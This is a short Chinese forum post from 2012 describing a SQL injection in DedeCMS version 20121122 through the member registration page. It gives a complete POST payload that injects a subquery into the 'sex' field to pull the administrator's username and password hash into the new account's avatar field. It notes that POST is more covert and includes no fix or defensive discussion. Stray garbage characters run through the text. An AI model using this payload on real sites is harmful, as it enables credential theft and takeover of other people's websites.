dedecms版本 20121122
; f' A5 }6 ^" g
6 J( ]2 U8 k- x& X9 W需要magic_quotes_gpc=Off
9 E: x7 o9 ?/ `, d- [
- c1 Z1 T! j' R应该是没有什么大危害的漏洞.
: W2 z- ]$ C4 n: {原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.) U1 I8 A. c: w6 c
$ P( v4 f& |( G; Y9 Y
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.0 V" ^/ x2 i: n
POST提交以下数据,其实不用POST提交的,这样隐蔽点. [( p5 \3 O6 |! ?
* Z: |$ E Z; p; @2 A
http:///de/member/reg_new.php+ H! P: _" V- ^" F/ m) g
% N$ i! j( F/ g2 i9 EPOST7 n: c! P% |- } D3 Z0 G
1 C, @. u0 |# ^4 s( q
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
: Y2 R0 e$ M8 d* Z
+ O( ]# K# h6 G: l! F0 T! J6 H1 v成功注册后,头像处里面有好玩的信息.
, o& D% r, H7 H3 n/ P3 M3 n
2 n3 b, [0 x2 i, \) R8 V2 ~8 e3 O, i |
发表于 2012-12-5 10:03:32
收藏
支持
反对